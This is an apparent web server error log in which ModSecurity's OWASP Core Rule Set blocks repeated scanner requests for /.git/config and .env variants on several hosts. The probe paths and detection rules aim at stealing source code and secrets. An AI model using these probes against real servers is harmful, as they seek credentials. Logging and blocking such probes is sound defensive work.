[Sun Apr 20 18:22:34.865877 2025] [:error] [pid 2598990] [client 179.43.188.122:44444] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /src/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.git/config"] [unique_id "aAUfSpopp4YK0qAensjBtwAAAAg"]
[Sun Apr 20 18:22:34.866099 2025] [:error] [pid 2598990] [client 179.43.188.122:44444] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.git/config"] [unique_id "aAUfSpopp4YK0qAensjBtwAAAAg"]
[Sun Apr 20 18:22:34.866257 2025] [:error] [pid 2598990] [client 179.43.188.122:44444] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.git/config"] [unique_id "aAUfSpopp4YK0qAensjBtwAAAAg"]
[Sun Apr 20 18:22:34.866589 2025] [authz_core:error] [pid 2599010] [client 179.43.188.122:44458] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.git
[Sun Apr 20 18:22:34.875785 2025] [:error] [pid 2597531] [client 179.43.188.122:44468] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /staging/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.git/config"] [unique_id "aAUfSivq4uit1rpTjEgSIQAAAAI"]
[Sun Apr 20 18:22:34.876003 2025] [:error] [pid 2597531] [client 179.43.188.122:44468] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.git/config"] [unique_id "aAUfSivq4uit1rpTjEgSIQAAAAI"]
[Sun Apr 20 18:22:34.876152 2025] [:error] [pid 2597531] [client 179.43.188.122:44468] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.git/config"] [unique_id "aAUfSivq4uit1rpTjEgSIQAAAAI"]
[Sun Apr 20 18:22:35.619938 2025] [:error] [pid 2599013] [client 179.43.188.122:44484] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /plugins/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.git/config"] [unique_id "aAUfS8JN6RtskYJNqtKL_gAAAA8"]
[Sun Apr 20 18:22:35.620170 2025] [:error] [pid 2599013] [client 179.43.188.122:44484] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.git/config"] [unique_id "aAUfS8JN6RtskYJNqtKL_gAAAA8"]
[Sun Apr 20 18:22:35.620333 2025] [:error] [pid 2599013] [client 179.43.188.122:44484] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.git/config"] [unique_id "aAUfS8JN6RtskYJNqtKL_gAAAA8"]
[Sun Apr 20 18:22:35.657844 2025] [:error] [pid 2597529] [client 179.43.188.122:44488] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /core/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "aAUfSwZGKWoSh0bB6I5KjgAAAAA"]
[Sun Apr 20 18:22:35.658071 2025] [:error] [pid 2597529] [client 179.43.188.122:44488] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "aAUfSwZGKWoSh0bB6I5KjgAAAAA"]
[Sun Apr 20 18:22:35.658227 2025] [:error] [pid 2597529] [client 179.43.188.122:44488] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "aAUfSwZGKWoSh0bB6I5KjgAAAAA"]
[Sun Apr 20 18:22:38.781529 2025] [:error] [pid 2599000] [client 179.43.188.122:44496] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static../.git/config"] [unique_id "aAUfTi74hH9DYn7JWeMqigAAAAw"]
[Sun Apr 20 18:22:38.781799 2025] [:error] [pid 2599000] [client 179.43.188.122:44496] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static../.git/config"] [unique_id "aAUfTi74hH9DYn7JWeMqigAAAAw"]
[Sun Apr 20 18:22:38.781975 2025] [:error] [pid 2599000] [client 179.43.188.122:44496] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static../.git/config"] [unique_id "aAUfTi74hH9DYn7JWeMqigAAAAw"]
[Sun Apr 20 23:42:23.369728 2025] [:error] [pid 2599010] [client 93.123.109.81:33142] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAVqP3NuewUkVloE_4FczwAAAA0"]
[Sun Apr 20 23:42:23.369992 2025] [:error] [pid 2599010] [client 93.123.109.81:33142] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAVqP3NuewUkVloE_4FczwAAAA0"]
[Sun Apr 20 23:42:23.370197 2025] [:error] [pid 2599010] [client 93.123.109.81:33142] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAVqP3NuewUkVloE_4FczwAAAA0"]
[Sun Apr 20 23:42:23.476267 2025] [:error] [pid 2599000] [client 93.123.109.81:33152] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aAVqPy74hH9DYn7JWeMqnQAAAAw"]
[Sun Apr 20 23:42:23.476549 2025] [:error] [pid 2599000] [client 93.123.109.81:33152] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aAVqPy74hH9DYn7JWeMqnQAAAAw"]
[Sun Apr 20 23:42:23.476734 2025] [:error] [pid 2599000] [client 93.123.109.81:33152] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aAVqPy74hH9DYn7JWeMqnQAAAAw"]
[Sun Apr 20 23:42:23.609476 2025] [:error] [pid 2597529] [client 93.123.109.81:33162] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aAVqPwZGKWoSh0bB6I5KnwAAAAA"]
[Sun Apr 20 23:42:23.610689 2025] [:error] [pid 2597529] [client 93.123.109.81:33162] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aAVqPwZGKWoSh0bB6I5KnwAAAAA"]
[Sun Apr 20 23:42:23.610916 2025] [:error] [pid 2597529] [client 93.123.109.81:33162] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aAVqPwZGKWoSh0bB6I5KnwAAAAA"]
[Sun Apr 20 23:42:23.747457 2025] [:error] [pid 2598990] [client 93.123.109.81:33176] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aAVqP5opp4YK0qAensjByQAAAAg"]
[Sun Apr 20 23:42:23.747702 2025] [:error] [pid 2598990] [client 93.123.109.81:33176] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aAVqP5opp4YK0qAensjByQAAAAg"]
[Sun Apr 20 23:42:23.747875 2025] [:error] [pid 2598990] [client 93.123.109.81:33176] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aAVqP5opp4YK0qAensjByQAAAAg"]
[Sun Apr 20 23:42:25.239527 2025] [authz_core:error] [pid 2597529] [client 93.123.109.81:33230] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sun Apr 20 23:42:25.340037 2025] [:error] [pid 2598990] [client 93.123.109.81:33232] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aAVqQZopp4YK0qAensjBygAAAAg"]
[Sun Apr 20 23:42:25.340301 2025] [:error] [pid 2598990] [client 93.123.109.81:33232] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aAVqQZopp4YK0qAensjBygAAAAg"]
[Sun Apr 20 23:42:25.340468 2025] [:error] [pid 2598990] [client 93.123.109.81:33232] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aAVqQZopp4YK0qAensjBygAAAAg"]
[Mon Apr 21 16:21:55.412621 2025] [:error] [pid 2629383] [client 45.148.10.172:49580] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aAZUg_LJL7pNMe4-DjtovgAAAAs"]
[Mon Apr 21 16:21:55.413000 2025] [:error] [pid 2629383] [client 45.148.10.172:49580] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aAZUg_LJL7pNMe4-DjtovgAAAAs"]
[Mon Apr 21 16:21:55.413598 2025] [:error] [pid 2629383] [client 45.148.10.172:49580] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aAZUg_LJL7pNMe4-DjtovgAAAAs"]
[Mon Apr 21 22:20:38.781416 2025] [:error] [pid 2623792] [client 89.248.165.249:57734] [client 89.248.165.249] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAaolq3ykfy7zwBgWC0cUAAAAAc"]
[Mon Apr 21 22:20:38.782703 2025] [:error] [pid 2623792] [client 89.248.165.249:57734] [client 89.248.165.249] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAaolq3ykfy7zwBgWC0cUAAAAAc"]
[Mon Apr 21 22:20:38.782947 2025] [:error] [pid 2623792] [client 89.248.165.249:57734] [client 89.248.165.249] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAaolq3ykfy7zwBgWC0cUAAAAAc"]
[Mon Apr 21 22:26:55.893623 2025] [:error] [pid 2629385] [client 138.199.236.8:54338] [client 138.199.236.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAaqD80K_jEHJbfZLReoZAAAAAw"]
[Mon Apr 21 22:26:55.893870 2025] [:error] [pid 2629385] [client 138.199.236.8:54338] [client 138.199.236.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAaqD80K_jEHJbfZLReoZAAAAAw"]
[Mon Apr 21 22:26:55.894049 2025] [:error] [pid 2629385] [client 138.199.236.8:54338] [client 138.199.236.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAaqD80K_jEHJbfZLReoZAAAAAw"]
[Mon Apr 21 23:27:25.734225 2025] [:error] [pid 2617697] [client 88.99.33.29:35676] [client 88.99.33.29] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAa4PcCkQ10iOGi44lZubgAAAAE"]
